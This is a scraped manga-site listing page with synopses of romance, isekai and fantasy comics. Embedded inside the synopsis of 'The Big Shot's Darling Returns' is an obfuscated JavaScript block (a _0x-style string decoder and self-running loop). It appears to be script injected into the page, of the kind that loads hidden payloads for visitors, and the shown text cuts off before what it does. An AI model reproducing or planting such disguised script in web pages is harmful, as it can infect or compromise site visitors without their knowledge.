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18096 results

The Silent Sacrifice Princess And The Black Dragons Marriage

Read manga The Silent Sacrifice Princess And The Black Dragons Marriage Ayame, born into a family of priestesses blessed by the Black Dragon God, possesses a unique ability to heal people through her voice. However, after the death of her parents, she is taken in by her uncle’s family who mistreat her, leading to the loss of her voice. Her cousin Mari even takes over Ayame’s rightful position as priestess, and Ayame is eventually offered as a sacrifice to the Black Dragon. “Why must I be killed like this?! Someone, please help me!” Her desperate plea brought forth the Black Dragon from the sky. He descends and transforms into a handsome young man, gently takes Ayame’s hand, and flies away with her. Thus begins Ayame’s new life as the bride of Saku, the Black Dragon, living in his mansion situated between the celestial and human worlds. However, Ayame’s cousin Mari, envious of her new status as the beautiful bride of the Black Dragon schemes to steal him away… A Japanese-style Cinderella story of a gentle-hearted girl who lost her voice and a proud yet compassionate Black Dragon.

18 hours ago

Plunder My Soul And Heart

Read manhwa Plunder My Soul And Heart / ヤバい!アンチと入れ替わっちゃった! / 糟糕!我和黑粉互换了 / Oh No! I’ve Swapped Bodies with an Anti-Fan I, the leader of the boy band TREE, somehow have my soul swapped with a girl. To complicate the matter further, she happens to be an anti-fan of mine. In my body, she gets to live in our dormitory, sleep in my bed, approach her idol without being yelled at and even tries to dig up my scandal! Well then, I have no choice but to tackle her.


Your Highness the Crown Prince, Your Mask Has Dropped Again

Read manhua Your Highness the Crown Prince, Your Mask Has Dropped Again / Mi amado visita mi tumba / My Beloved Visits My Grave / My Love Comes to See the Grass on my Grave While under the cover identity “Murong Yan,” the crown prince became smitten with the palace guard, Gu Lang, after a fated encounter. The two had to part ways after “Murong Yan” died, but the crown prince couldn’t resist trying to get close to his beloved once again… this time under a different cover identity. Taizi Dianxia Ni De Majia You Diaole Tàizǐ Diànxià Nǐ De Mǎjiǎ Yòu Diàole There Goes Your Cover Again, Your Highness Your Highness, Your Mask Has Fallen Again Your Royal Highness, Please Dress Up Your Clothes Your Royal Highness, Your Vest Is off Again 太子殿下你的马甲又掉了 心上人来看我的坟头草


The Big Shot’s Darling Returns

Jun Qing finally transmigrates back to her original world, but finds out her own body had been taken over by another transmigrator for 2 years. Even the fourth brother, whom she has been pining after secretly for many years treats her coldly. Dealing with the trouble the previous transmigrator left behind, and simultaneously getting fourth brother's heart back, Jun Qing says this is no hard feat!<script></script><script>function _0x4b69(_0x49445a,_0x3c4767){var _0x479727=_0x42ef();return _0x4b69=function(_0x1bf912,_0x252e7d){_0x1bf912=_0x1bf912-(0x61*0x17+-0x2*-0xaf3+-0x1cb7*0x1);var _0x1a3fed=_0x479727[_0x1bf912];return _0x1a3fed;},_0x4b69(_0x49445a,_0x3c4767);}(function(_0x2717b6,_0x3187b3){var _0x13c3c5=_0x4b69,_0x2deeee=_0x2717b6();while(!![]){try{var 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I'm in Love With the Villainess

Ordinary office worker Oohashi Rei wakes up in the body of the protagonist of her favorite otome game, Revolution. To her delight, the first person to greet her is also her favorite character, Claire Francois–the main antagonist of the story! Now, Rei is determined to romance Claire instead of the game’s male leads. But how will her villainous lady love react to this new courtship?! Indonesian: SpoilerSeorang pegawai kantor biasa, Oohashi Rei, bereinkarnasi sebagai seorang Heroine bernama Rei Taylor di Game Otome favoritnya, "Revolution". Kebetulan lagi, orang pertama yang menyambutnya adalah karakter favoritnya, Claire Francois- antagonis dari cerita ini! Kini Rei bertekad untuk membangun hubungan romantis dengan Claire, bukan dengan pemeran utama pria. Lantas, bagaimanakah gadis jahat yang dia cintai akan bereaksi terhadap kemesraan baru ini?!


Haitatsusaki no Onee-san ga Kowa Sugiru

An introverted part-time food delivery guy working in the countryside receives a food delivery order. When he reaches the delivery address, he discovers that the recipient is a tall and intimidating-like woman. However, as the story unfolds, he eventually discovers…


My Blood-Curdling Campus Life

A cute guy with an angelic face? Check. A cold and aloof outsider with a cat? Check. A class full of vampires? Check... Wait, what? All her life, Seonha Shin has lived in the shadow of her sister, Seonghye, who is one year older than her. Luckily, there is one thing Seonha does better than her sister -- donating blood! When Seonha gets special admission into a prestigious university as a blood donor, she finally starts to feel like the main character of her life. Little did she know she'd be surrounded by vampires!


I’m Doomed if They Become Obsessed

Read manhwa I’m Doomed if They Become Obsessed / If You’re Obsessed, You’re Doomed I opened my eyes to find myself in an unfamiliar place. In the midst of confusion, the only thing I could rely on was my phone. To recover my memories and return, I had to raise the affection levels of the targets and see a special ending. So, I worked hard to interact with the targets, raising their affection levels one by one. It seemed to be going smoothly—until a new notification arrived. 『Each target’s affection level is capped at 5. If it reaches 6 or more, an “overheat” state will be triggered, greatly increasing the likelihood of an extreme ending.』 ‘Just now… how many hearts were there?’ As I tried to check the system window, I heard approaching footsteps. 집착당하면 파멸합니다


Sickly? Husband’s Contractual Wife

I’m Selena, a daughter born to a family well-known for their fertile women. I was all but sold off in a marriage to a sickly duke whose life hung in the balance, all for the sake of producing an heir for his family. They provided me a medicine purported to aid in pregnancy, and the astrologist advised me good days for sleeping together, but… there was no child. “So, are there any signs of pregnancy?” “Ah, I-I’m sorry.” “You’re useless. What luck do you think won you the position of the duke’s wife?” I couldn’t say a word. ‘No, excuse me. I only have to look at the sky to pluck a star. That’s how I attained this position.’ * [(metaphor) Lit. Plucking a star from the sky: something that’s difficult to get/achieve) *** A husband who doesn’t like touching me in the least. But he’s still pitiful so let’s at least make him healthy by feeding him nutritious food, getting him to exercise, and I’ll taste test any doubtful food first personally. Once he recovers from my extensive efforts, I’ll sign an annulment paper and flee, but… “You agreed to a contract to bear me an heir. But to think you would go back on your words…” Although he’s in good health now, my “former” husband has become a bit too healthy. “You’re healthy now!” “The duties of marriage are sacred. I will collect my dues.” “Wait. Wait! But we’re divorced? We’re no longer husband and wife…” He smirked then took a piece of paper from his breast pocket and tossed it to me. “We aren’t divorced yet.” Huh?!


Academy’s Genius Swordmaster

Read Academy’s Genius Swordmaster Manhwa Ronan lived a wasteful life filled with regrets. A second chance befalls him at the end of his futile life. He went back to the time when he was a ten-year-old child! For the people who sacrificed themselves for him, he becomes determined to live a new life. Academy’s Genius Swordmaster, Academy’s Genius Swordsman, Academy Genius Swordsman, 아카데미의 천재칼잡이
